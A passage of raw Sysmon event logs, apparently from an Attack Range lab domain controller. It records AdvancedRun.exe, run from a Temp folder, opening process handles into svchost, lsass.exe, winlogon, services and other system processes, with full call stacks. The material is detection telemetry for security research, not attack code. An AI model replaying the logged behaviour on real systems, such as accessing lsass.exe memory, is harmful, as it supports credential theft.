1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE
10341000x80000000000000004080460Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.459{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080459Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.459{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE
10341000x80000000000000004080458Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.459{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE
10341000x80000000000000004080457Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.459{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE
10341000x80000000000000004080456Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.459{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE
10341000x80000000000000004080455Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.459{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1
10341000x80000000000000004080454Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.458{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080453Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.458{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE
10341000x80000000000000004080452Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.458{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080451Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.457{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE
10341000x80000000000000004080447Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.456{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080446Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.455{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
734700x80000000000000004080439Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.447{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\wtsapi32.dll10.0.14393.0 (rs1_release.160715-1616)Windows Remote Desktop Session Host Server SDK APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationwtsapi32.dllMD5=55D5450C85C0A0DE8F2A22F2C0C816AE,SHA256=3CF7B03BEB7C47157C47EACEBFB731096468D1D25FF6784485EFD2FB806C4C5EtrueMicrosoft WindowsValidATTACKRANGE\Administrator
10341000x80000000000000004080425Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.454{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080423Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.453{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
